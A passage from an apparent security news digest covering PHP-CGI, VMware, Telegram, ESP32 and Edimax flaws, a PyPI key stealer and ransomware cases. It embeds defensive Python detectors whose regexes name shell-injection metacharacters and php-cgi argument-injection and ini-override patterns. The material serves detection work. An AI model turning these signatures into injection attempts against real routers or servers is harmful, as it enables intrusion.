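    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Shell metacharacters that have no business in a two-letter country code.
SHELL_META_RE = re.compile(r"[;|`]|\$\(|&&")

# %AD immediately before an option letter. A preceding %XX byte would make the
# soft hyphen part of a multi-byte UTF-8 sequence (e.g. %C2%AD), so that is not flagged.
PHP_CGI_RE = re.compile(r"(?<!%[0-9A-Fa-f]{2})%[aA][dD][a-zA-Z]")
PHP_INI_KEYS = ("allow_url_include", "auto_prepend_file")


def classify(target: str) -> Optional[str]:
    """Return a rule name if the request target matches a known exploitation pattern."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    # CVE-2023-1389: command injection in the `country` field of the locale API.
    # The injected value may also travel in a POST body, which access logs omit,
    # so this only covers query-string variants.
    if parts.path.endswith("/locale") and params.get("form") == ["country"]:
        for value in params.get("country", []):
            if SHELL_META_RE.search(value):
                return "tplink-locale-country-injection"
    # CVE-2024-4577: php-cgi argument injection via best-fit mapping of %AD to '-'.
    if PHP_CGI_RE.search(parts.query):
        return "php-cgi-argument-injection"
    # Weaker signal: the ini directives the public exploits set, however encoded.
    decoded = unquote(parts.query).lower()
    if any(key in decoded for key in PHP_INI_KEYS):
        return "php-cgi-ini-override"
    return None


def triage(log_text: str):
    """Run classify() over every parseable line and collect the hits."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rule = classify(m["target"])
        if rule:
            hits.append({"ip": m["ip"], "rule": rule, "target": m["target"]})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(f"{hit['ip']:15} {hit['rule']:32} {hit['target']}")
```

The negative lookbehind matters in practice: `%C2%AD` is how a legitimate UTF-8 soft hyphen appears in a URL, and without it the rule pages on every page whose query string carries one.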

Recommended read:
References :
  • Cisco Talos Blog: Cisco Talos has discovered an active exploitation of CVE-2024-4577 by an attacker in order to gain access to the victim's machines and carry out post-exploitation activities.
  • securityaffairs.com: Threat actors exploit PHP flaw CVE-2024-4577 for remote code execution. Over 1,000 attacks detected globally.
  • www.scworld.com: Attempted exploitation escalated across the U.S., Japan, Singapore, and other parts of the world.
  • www.cybersecuritydive.com: Critical PHP vulnerability under widespread cyberattack
  • The GreyNoise Blog: GreyNoise Detects Mass Exploitation of Critical PHP-CGI Vulnerability (CVE-2024-4577), Signaling Broad Campaign
  • MSSP feed for Latest: Targeting Of Critical PHP Vulnerability Expands Globally
  • www.techradar.com: Experts warn this critical PHP vulnerability could be set to become a global problem
  • www.scworld.com: Critical 9.8 PHP flaw exploited in US, Japan and Singapore
  • The DefendOps Diaries: Explore CVE-2024-4577, a critical PHP vulnerability affecting CGI mode on Windows, and learn about its implications and mitigation strategies.
  • BleepingComputer: Threat intelligence company GreyNoise warns that a critical PHP remote code execution vulnerability that impacts Windows systems is now under mass exploitation.
  • bsky.app: Threat intelligence company GreyNoise warns that a critical PHP remote code execution vulnerability that impacts Windows systems is now under mass exploitation.

Ashish Khaitan@The Cyber Express //
CISA has updated its Known Exploited Vulnerabilities (KEV) Catalog to include critical vulnerabilities affecting VMware ESXi, Workstation, Fusion, and Linux kernel. These flaws are actively being exploited, posing a significant risk, particularly for federal government organizations. Rapid patching is essential to mitigate the active cyber threats associated with these vulnerabilities.

The identified VMware vulnerabilities, CVE-2025-22224, CVE-2025-22225, and CVE-2025-22226, allow for remote code execution (RCE) and privilege escalation. Specifically, CVE-2025-22224 is a Time-of-Check Time-of-Use (TOCTOU) vulnerability with a CVSSv3 score of 9.3, classified as Critical. The affected systems include various versions of VMware ESXi, Workstation, Fusion, Cloud Foundation, and Telco Cloud Platform, with updated versions available to address the flaws.

Recommended read:
References :

Samarth Mishra@cysecurity.news //
A malicious Python package named 'set-utils' has been discovered on the Python Package Index (PyPI) repository. This package is designed to steal Ethereum private keys by exploiting commonly used account creation functions. Disguised as a utility for Python sets, the package mimics popular libraries, tricking developers into installing it. Since its appearance, 'set-utils' has been downloaded over 1,000 times, posing a significant threat to Ethereum users and developers, particularly those working with Python-based wallet management libraries. The Python security team has removed the malicious package from PyPI.

The 'set-utils' package operates by silently modifying standard Ethereum wallet creation functions. The private keys are exfiltrated within blockchain transactions via the Polygon RPC endpoint to resist traditional detection efforts. The stolen keys are encrypted using an attacker-controlled RSA public key before transmission, making detection challenging. Even if the package is uninstalled, any Ethereum wallets created while it was active remain compromised. To mitigate these risks, developers should employ regular dependency audits and automated scanning tools to detect malicious behaviors in third-party packages.
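Both the npm packages attributed to Lazarus earlier on this page and the PyPI set-utils case above rely on names that resemble trusted libraries. The screen below is an added example, not Socket's or any registry's scanner; the allow-list is a constructed stand-in for a registry's most-downloaded names, and the three heuristics (separator variants, one-edit typos, a trusted stem plus a generic tail) catch the npm names built on is-buffer, postcss and react but not names with no recognisable stem, which is why the dependency audits and behavioural scanning recommended above remain necessary.

```python
"""Screen dependency names for imitation of well-known packages."""
import re

# Constructed allow-list; a real check would load the registry's top-N names.
KNOWN = {"is-buffer", "postcss", "react", "lodash", "express", "requests", "setuptools"}
# Generic tails that get bolted onto a trusted name to make a plausible new one.
GENERIC_TOKENS = {"validator", "optimizer", "utils", "util", "helper", "helpers",
                  "dependency", "package", "plugin", "core"}
SEP_RE = re.compile(r"[-_.]")


def normalize(name):
    """Lower-case and drop separators so is_buffer, isbuffer and is-buffer compare equal."""
    return SEP_RE.sub("", name.lower())


def levenshtein(a, b):
    """Classic edit distance (insert, delete, substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_name(name, known=KNOWN):
    """Return (rule, imitated_name) if `name` looks like an imitation, else None."""
    name = name.lower()
    if name in known:
        return None
    by_length = sorted(known, key=len, reverse=True)
    # Same letters, different separators: is_buffer or isbuffer for is-buffer.
    for k in by_length:
        if normalize(name) == normalize(k):
            return ("delimiter-variant", k)
    # One typo away: lodsh for lodash.
    closest = min(by_length, key=lambda k: levenshtein(name, k))
    if levenshtein(name, closest) <= 1:
        return ("near-miss", closest)
    # Trusted stem plus a generic tail: is-buffer-validator, postcss-optimizer.
    for k in by_length:
        for sep in "-_.":
            if name.startswith(k + sep):
                tail_tokens = set(SEP_RE.split(name[len(k) + 1:]))
                if tail_tokens & GENERIC_TOKENS:
                    return ("affix", k)
    return None


def audit_dependencies(names, known=KNOWN):
    """Map each flagged name to the rule that fired and the package it imitates."""
    flagged = {}
    for n in names:
        verdict = check_name(n, known)
        if verdict:
            flagged[n] = verdict
    return flagged


if __name__ == "__main__":
    # The six npm names reported on this page.
    page_names = ["postcss-optimizer", "is-buffer-validator", "yoojae-validator",
                  "event-handle-package", "array-empty-validator", "react-event-dependency"]
    for n, (rule, target) in audit_dependencies(page_names).items():
        print(f"{n:26} {rule:18} imitates {target}")
```

Run it over the names in a lockfile rather than over the manifest, since transitive dependencies are where an imitation usually hides; a hit is a prompt to inspect the package, not proof that it is malicious.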

Recommended read:
References :
  • The Hacker News: Cybersecurity researchers have discovered a malicious Python package on the Python Package Index (PyPI) repository that's equipped to steal a victim's Ethereum private keys by impersonating popular libraries.
  • Developer Tech News: A malicious package designed to steal private keys for Ethereum wallets has been uncovered within the Python Package Index (PyPI). According to Socket, this package – named ‘set-utils’ – masquerades as a utility for Python sets and has been actively targeting developers.
  • Cyber Security News: PyPI Malware Exploits Developers to Hijack Ethereum Wallets
  • gbhackers.com: New PyPI Malware Targets Developers to Steal Ethereum Wallets
  • www.cysecurity.news: Researchers at have exposed a malicious PyPi (Python Package Index package), set-utils, that steals Ethereum private keys by abusing a “commonly used account creation functions.”

Lily Hay@WIRED //
Cybercriminals have allegedly stolen over $635,000 worth of Taylor Swift concert tickets by exploiting a loophole in an offshore ticketing system. Two individuals, Tyrone Rose, 20, and Shamara Simmons, 31, have been arrested and charged with grand larceny and computer tampering. The scheme involved stealing URLs for nearly 1,000 tickets to various events, including Taylor Swift's Eras Tour, Ed Sheeran concerts, Adele concerts, NBA games, and the US Open Tennis Championships, before reselling them for substantial profit.

Between June 2022 and July 2023, Rose and Simmons allegedly stole the tickets through an offshore ticket vendor and then resold them on StubHub in the US for significant profit. Rose, an employee of Sutherland Global Services, a third-party contractor for StubHub Jamaica, is accused of abusing his access to the network to find a backdoor. Prosecutors say the pair stole the tickets by allegedly intercepting approximately 350 orders from StubHub. The investigation is ongoing to determine if the Swift ticket scam was part of a wider operation.

Recommended read:
References :
  • WIRED: Cybercriminals Allegedly Used a StubHub Backdoor to Steal Taylor Swift Tickets
  • The Register - Security: Alleged cyber scalpers Swiftly cuffed over $635K Taylor ticket heist
  • The DefendOps Diaries: Cybercrime Exposes Vulnerabilities in Ticketing Systems: A Case Study
  • BleepingComputer: Cybercrime 'crew' stole $635,000 in Taylor Swift concert tickets
  • darkmarc.substack.com: Cybercriminals pulled off a massive ATM heist, hackers stole $600K in Taylor Swift concert tickets, and Mark Cuban made a bold move for laid-off tech workers. Instagram users were hit with a disturbing glitch, and Mozilla’s new terms sparked privacy fears. Here’s what happened this week.
  • www.techradar.com: Cybercriminals used vendor backdoor to steal almost $600,000 of Taylor Swift tickets
  • bsky.app: Cybercriminals Allegedly Used a StubHub Backdoor to Steal Taylor Swift Tickets

Mandvi@Cyber Security News //
A critical zero-day vulnerability, dubbed EvilLoader, has been discovered in Telegram for Android by security researcher 0x6rss. This exploit allows attackers to disguise malicious APK files as video files, potentially leading to unauthorized malware installations on users' devices. The vulnerability lies in Telegram's file handling, which trusts the file extension: an HTML file named with an .mp4 extension is treated as a legitimate video even though it contains no video data.

When a user attempts to play these crafted "videos," Telegram prompts them to open the file in an external application, potentially leading to the installation of malicious software. For the attack to succeed, users must click the embedded link multiple times, disable Android’s security restriction on installing apps from unknown sources, and proceed with the installation. The file facilitating this attack has been available for sale on underground hacker forums.
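The mitigation the mismatch above points at is content sniffing: check what the bytes are before trusting the extension and handing the file to an external app. The following is an added example, not Telegram code, with constructed sample files.

```python
"""Check that a file named .mp4 really carries MP4 content before it is
handed off as a video.  Added example, not Telegram code; samples are
constructed."""
import re

# Leading markup that identifies an HTML/XML document (case-insensitive).
HTML_RE = re.compile(rb"^\s*(<!doctype\s+html|<html|<script|<\?xml)", re.I)

def sniff(data: bytes) -> str:
    """Return 'mp4', 'html' or 'unknown' from the leading bytes alone."""
    # ISO BMFF (MP4/MOV) files start with a 4-byte box size followed by 'ftyp'.
    if len(data) >= 8 and data[4:8] == b"ftyp":
        return "mp4"
    if HTML_RE.match(data[:512]):
        return "html"
    return "unknown"

def safe_to_open_as_video(filename: str, data: bytes) -> bool:
    """True only when the name claims video AND the content actually looks like MP4."""
    return filename.lower().endswith(".mp4") and sniff(data) == "mp4"

# Constructed samples: a minimal MP4 header and an HTML page named like a video.
REAL_MP4 = b"\x00\x00\x00\x18ftypmp42" + b"\x00" * 16
FAKE_MP4 = b"<!DOCTYPE html><html><body>not a video</body></html>"
```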

Recommended read:
References :
  • Cyber Security News: A critical zero-day vulnerability in Telegram for Android, dubbed EvilLoader, has been discovered by security researcher 0x6rss. This exploit allows attackers to disguise malicious APKs as video files, potentially leading to unauthorized malware installations on users’ devices.
  • WeLiveSecurity: ESET researchers discuss how they uncovered a zero-day Telegram for Android exploit that allowed attackers to send malicious files posing as videos
  • securityonline.info: Telegram’s EvilLoader: Hackers Exploit Video Flaw Again

Veronika Telychko@SOC Prime Blog //
An undocumented "backdoor", in practice a set of undocumented commands, has been discovered in the ESP32 microchip, a product of the Chinese manufacturer Espressif. This chip is a cornerstone in the Internet of Things (IoT) ecosystem, providing essential Bluetooth and Wi-Fi connectivity. It is widely used in over a billion devices as of 2023. The "backdoor," as it is referred to, could be leveraged for attacks including spoofing trusted devices, unauthorized data access, and pivoting to other devices on the network.

This discovery was made by Spanish researchers Miguel Tarascó Acuña and Antonio Vázquez Blanco from Tarlogic Security, who presented their findings at RootedCON. Their research underscores the critical need for robust security measures in IoT devices. The potential impact could be extensive, considering the chip’s widespread usage. This discovery raises concerns about the security of numerous devices and systems that rely on the ESP32 for their operations.

Recommended read:
References :
  • infosec.exchange: Ok, poll for the "supply chain risk management" people! There's a backdoor in the ESP32 wifi/bluetooth chip.
  • Anonymous: The ubiquitous microchip made by Chinese manufacturer Espressif and used by over 1 billion units as of 2023 contains an undocumented "backdoor" that could be leveraged for attacks.
  • The DefendOps Diaries: Discover the ESP32 backdoor's impact on IoT security and the urgent need for robust protection measures.
  • www.bleepingcomputer.com: The ubiquitous ESP32 microchip made by Chinese manufacturer Espressif and used by over 1 billion units as of 2023 contains an undocumented "backdoor" that could be leveraged for attacks.
  • BleepingComputer: Infosec.Exchange post about ESP32 Microchip Backdoor
  • BleepingComputer: Infosec.Exchange post about ESP32 microchip with undocumented backdoor.
  • Jon Greig: IOC.Exchange post about the backdoor
  • TARNKAPPE.INFO: Bluetooth chip backdoor discovered: over 1 billion devices affected
  • Rescana: Unveiling the ESP32 Bluetooth Chip Backdoor: Security Vulnerabilities and Mitigation Strategies
  • BleepingComputer: The ubiquitous ESP32 microchip made by Chinese manufacturer Espressif and used by over 1 billion units as of 2023 contains undocumented commands that could be leveraged for attacks.
  • dragosr: Oh, is that all? A few (billion?) ESP32 devices let attackers establish persistency in local flash using an undocumented commands set accessible from an over the air pivot, and low level protocol injection and spoofing control...
  • securityaffairs.com: Undocumented hidden feature found in Espressif ESP32 microchip
  • BleepingComputer: The ubiquitous ESP32 microchip made by Chinese manufacturer Espressif and used by over 1 billion units as of 2023 contains an undocumented "backdoor" that could be leveraged for attacks.
  • Davey Winder: Identity Theft Warning—Hidden Commands In 1 Billion Bluetooth Chips
  • www.techradar.com: Top Bluetooth chip security flaw could put a billion devices at risk worldwide
  • Security | TechRepublic: Researchers warn these commands could be exploited to manipulate memory, impersonate devices, and bypass security controls.
  • BetaNews: Attackers can use undocumented commands to hijack Chinese-made Bluetooth chips
  • CyberInsider: Hidden Commands Discovered in Bluetooth Chip Used in a Billion Devices
  • bsky.app: Undocumented "backdoor" found in Bluetooth chip used by a billion devices
  • Matthew Rosenquist: The recent undocumented code in the ESP32 microchip, made by Chinese manufacturer Espressif Systems, is used in over 1 billion devices and could represent a cybersecurity risk.
  • SOC Prime Blog: CVE-2025-27840: Vulnerability Exploitation in Espressif ESP32 Bluetooth Chips Can Lead to Unauthorized Access to Devices

Pierluigi Paganini@Security Affairs //
A critical command injection vulnerability, identified as CVE-2025-1316, impacting the Edimax IC-7100 IP camera is currently being exploited by botnet malware to compromise devices. This flaw allows attackers to achieve remote command execution, potentially leading to denial-of-service. Mirai-based botnets are actively exploiting this zero-day vulnerability.

Unpatched Edimax IP cameras are now prime targets in ongoing botnet attacks. Security researchers at Akamai discovered the flaw and reported it to the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which attempted to contact the Taiwanese vendor. Users are strongly advised to apply any available patches to prevent their devices from being compromised and enlisted into these botnets.

Recommended read:
References :
  • securityaffairs.com: US CISA warns that multiple botnets are exploiting a recently disclosed vulnerability, tracked as CVE-2025-1316 (CVSS score of 9.8), in Edimax IC-7100 IP cameras.
  • www.bleepingcomputer.com: A critical command injection vulnerability impacting the Edimax IC-7100 IP camera is currently being exploited by botnet malware to compromise devices.
  • bsky.app: A critical command injection vulnerability impacting the Edimax IC-7100 IP camera is currently being exploited by botnet malware to compromise devices.
  • bsky.app: A critical command injection vulnerability impacting the Edimax IC-7100 IP camera is currently being exploited by botnet malware to compromise devices.
  • securityonline.info: CISA Warns of Critical Edimax IP Camera Flaw (CVE-2025-1316) with Public Exploits and No Vendor Fix
  • The DefendOps Diaries: Understanding and Mitigating the Edimax IP Camera Vulnerability
  • www.techradar.com: Edimax IC-7100 camera was found vulnerable to a command injection flaw currently being used in remote code execution attacks.
  • www.scworld.com: Edimax IP camera zero-day

Sergiu Gatlan@BleepingComputer //
Microsoft has identified a North Korean hacking group known as Moonstone Sleet, previously tracked as Storm-1789, deploying Qilin ransomware in limited attacks. This represents a shift for the group, as they have historically used custom-built ransomware. The adoption of Qilin ransomware signifies a move towards Ransomware-as-a-Service (RaaS), where they utilize ransomware developed by external operators rather than relying solely on their own tools.

Moonstone Sleet's move to RaaS marks a new era in cyber threats, primarily driven by financial motivations, a departure from previous espionage-focused operations. They have been observed demanding ransoms as high as $6.6 million in Bitcoin. The group has also been known to use creative tactics, including fake companies, trojanized software, and even a malicious game to infiltrate targets, showcasing their adaptability and resourcefulness.

Recommended read:
References :
  • gbhackers.com: North Korean Moonstone Sleet Uses Creative Tactics to Deploy Custom Ransomware
  • The DefendOps Diaries: Moonstone Sleet's Shift to Ransomware-as-a-Service: A New Era in Cyber Threats
  • BleepingComputer: Microsoft: North Korean hackers join Qilin ransomware gang
  • Cyber Security News: North Korean Moonstone Sleet Deploys Custom Ransomware with Creative Tactics
  • securityaffairs.com: Microsoft researchers reported that North Korea-linked APT tracked as Moonstone Sleet has employed the Qilin ransomware in limited attacks.
  • www.scworld.com: Moonstone Sleet was previously reported to have been behind a FakePenny ransomware attack.

Bill Toulas@BleepingComputer //
The Akira ransomware group has been observed employing a novel attack technique, weaponizing unsecured IoT devices to bypass traditional security measures. Cybersecurity researchers at S-RM discovered that Akira exploited a vulnerable webcam to circumvent Endpoint Detection and Response (EDR) systems and encrypt systems within a target’s network. This allowed the ransomware to mount Windows Server Message Block (SMB) network shares of other devices on the network.

Akira ransomware successfully encrypted network shares over SMB, effectively working around the EDR defenses. Attackers mounted writable network shares from the webcam’s environment, while EDR solutions often ignore SMB traffic from IoT devices. The attackers demonstrated how unsecured IoT devices can bypass enterprise-grade defenses, highlighting that perimeter defense alone is insufficient in modern network environments.
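Because the webcam runs no EDR agent, the detection opportunity sits on the file servers and the network: share-access auditing that flags SMB sessions from an IoT segment or from any source outside the managed inventory. The following is an added example, not S-RM's or BleepingComputer's code; the log lines, subnets and key=value layout are constructed, loosely modelled on Windows security event 5140 (network share accessed).

```python
"""Server-side detection for SMB share access from an IoT segment, the gap
where host EDR never sees the webcam's traffic.  Added example; log lines,
subnets and the key=value layout are constructed (modelled on event 5140)."""
import ipaddress
from dataclasses import dataclass

# Constructed inventory: EDR-managed ranges and the camera/IoT VLAN.
MANAGED_NETS = [ipaddress.ip_network("10.10.0.0/16")]
IOT_NETS = [ipaddress.ip_network("10.77.0.0/24")]
WRITE_MASK = 0x2                      # WriteData/AddFile bit of the Access Mask
ADMIN_SHARES = {"C$", "ADMIN$", "IPC$"}

@dataclass
class Alert:
    timestamp: str
    source: str
    share: str
    severity: str
    reason: str

def parse_line(line: str) -> dict[str, str]:
    """Parse 'timestamp key=value ...' into a dict; the timestamp lands under 'ts'."""
    ts, _, rest = line.partition(" ")
    fields = dict(tok.split("=", 1) for tok in rest.split() if "=" in tok)
    fields["ts"] = ts
    return fields

def _in(addr, nets) -> bool:
    return any(addr in n for n in nets)

def detect_iot_smb(lines: list[str]) -> list[Alert]:
    """Flag 5140 events whose source is in an IoT range or outside managed ranges."""
    alerts = []
    for line in lines:
        f = parse_line(line)
        if f.get("EventID") != "5140":
            continue
        src = ipaddress.ip_address(f["SourceAddress"])
        if _in(src, MANAGED_NETS) and not _in(src, IOT_NETS):
            continue                  # ordinary workstation/server traffic
        share = f.get("ShareName", "").rsplit("\\", 1)[-1]
        writable = int(f.get("AccessMask", "0x0"), 16) & WRITE_MASK
        # A write, or any admin share, from an unexpected source is the encryption precursor
        severity = "high" if writable or share in ADMIN_SHARES else "medium"
        reason = "IoT segment" if _in(src, IOT_NETS) else "unmanaged source"
        alerts.append(Alert(f["ts"], str(src), share, severity, f"{reason} accessed share"))
    return alerts

# Constructed sample: a normal workstation read, a camera reading then writing
# shares, and an unrelated logon event that must be ignored.
SAMPLE_LOG = """\
2025-03-06T02:14:03Z EventID=5140 SourceAddress=10.10.5.21 ShareName=\\\\*\\Finance AccessMask=0x1
2025-03-06T02:14:09Z EventID=5140 SourceAddress=10.77.0.14 ShareName=\\\\*\\Finance AccessMask=0x1
2025-03-06T02:14:11Z EventID=5140 SourceAddress=10.77.0.14 ShareName=\\\\*\\C$ AccessMask=0x2
2025-03-06T02:15:00Z EventID=4624 SourceAddress=10.77.0.14 LogonType=3
""".splitlines()
```

Pair the rule with segmentation that simply denies SMB from the IoT VLAN to server ranges; the alert then becomes a firewall deny rather than a successful mount.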

Recommended read:
References :
  • Cyber Security News: Akira Ransomware Exploits RDP to Attack Windows Servers
  • gbhackers.com: Akira Ransomware Targets Windows Servers via RDP and Evades EDR with Webcam Trick
  • www.bleepingcomputer.com: Akira ransomware encrypted network from a webcam to bypass EDR
  • The DefendOps Diaries: Akira Ransomware: Unsecured Webcams and IoT Vulnerabilities
  • Hidden Dragon: Akira ransomware group has been found using an unsecured webcam to launch their attack and encrypt their target’s entire network. Akira used the webcam to mount Windows Server Message Block (SMB) network shares of the company's other devices. Then, they encrypted the network shares over SMB, successfully working around EDR.
  • securityaffairs.com: The Akira ransomware gang exploited an unsecured webcam to bypass EDR and launch encryption attacks on a victim’s network. Cybersecurity researchers at S-RM team discovered a novel attack technique used by the Akira ransomware gang. The ransomware group used an unsecured webcam to encrypt systems within a target’s network, bypassing Endpoint Detection and Response (EDR). The
  • Hidden Dragon: Akira ransomware gang has been found using an unsecured webcam to launch their attack and encrypt their target’s entire network.
  • BleepingComputer: The Akira ransomware gang was spotted using an unsecured webcam to launch encryption attacks on a victim's network, effectively circumventing Endpoint Detection and Response (EDR), which was blocking the encryptor in Windows.
  • Anonymous: ransomware gang was spotted using an unsecured webcam to launch encryption attacks on a victim's network, effectively circumventing Endpoint Detection and Response (EDR), which was blocking the encryptor in Windows.
  • DataBreaches.Net: The Akira ransomware gang exploited an unsecured webcam to bypass EDR and launch encryption attacks on a victim’s network.
  • Vulnerability-Lookup: Akira ransomware group has been found using an unsecured webcam to launch their attack and encrypt their target’s entire network
  • BleepingComputer: Ransomware gang encrypted network from a webcam to bypass EDR
  • Secure Bulletin: Akira ransomware’s ingenious IoT gambit: when webcams become cyberweapons
  • www.techradar.com: Security researchers explain how a company with EDR ended up hacked and its infrastructure encrypted.
  • Blog: Say cheese! Akira compromises victim via unsecured webcam
  • Risky Business: Risky Business #783 -- Evil webcam ransomwares entire Windows network

Thomas Brewster,@Thomas Fox-Brewster //
Federal investigators have linked the 2022 LastPass data breach to a $150 million cryptocurrency theft from a Ripple XRP wallet in January 2024. Authorities believe the hackers exploited stolen master passwords to gain unauthorized access to the wallet. The stolen XRP, initially valued at $150 million, is now worth an estimated $716 million due to fluctuations in the cryptocurrency market.

U.S. law enforcement has seized over $23 million in cryptocurrency connected to the theft. The U.S. Secret Service and FBI are actively investigating the case and working to recover the remaining stolen funds. Security researchers had previously identified a pattern of similar crypto heists linked to the LastPass breach, suggesting a broader impact of the password manager vulnerability. The incident highlights the significant risks associated with compromised password management systems.

Recommended read:
References :
  • bsky.app: US authorities have seized over $23 million in cryptocurrency linked to the theft of $150 million from a Ripple crypto wallet in January 2024. Investigators believe hackers who breached LastPass in 2022 were behind the attack.
  • krebsonsecurity.com: KrebsOnSecurity published findings from security researchers who concluded that a series of six-figure cyberheists across dozens of victims resulted from thieves cracking master passwords stolen from the password manager service LastPass in 2022.
  • The DefendOps Diaries: The Seizure of $23 Million in Cryptocurrency: A Detailed Analysis of the Ripple Wallet Hack Linked to LastPass Breach
  • Thomas Fox-Brewster: The stolen XRP is now worth $716 million. The Secret Service is trying to claw it back from unknown hackers.
  • www.bleepingcomputer.com: U.S. authorities have seized over $23 million in cryptocurrency linked to the theft of $150 million from a Ripple crypto wallet in January 2024. Investigators believe hackers who breached LastPass in 2022 were behind the attack.
  • BrianKrebs: New, by me: Feds Link $150M Cyberheist to 2022 LastPass Hacks In September 2023, KrebsOnSecurity published findings from security researchers who concluded that a series of six-figure cyberheists across dozens of victims resulted from thieves cracking master passwords stolen from the password manager service LastPass in 2022. In a court filing this week, U.S. federal agents investigating a spectacular $150 million cryptocurrency heist said they had reached the same conclusion.
  • Metacurity: Hack of LastPass in 2022 led to massive theft of XRP, now worth nearly $700 million
  • securityaffairs.com: US authorities seized $23M in crypto linked to a $150M Ripple hack, suspected to have been carried out by hackers from the 2022 LastPass breach.
  • www.scworld.com: LastPass hack leveraged to facilitate $150M crypto heist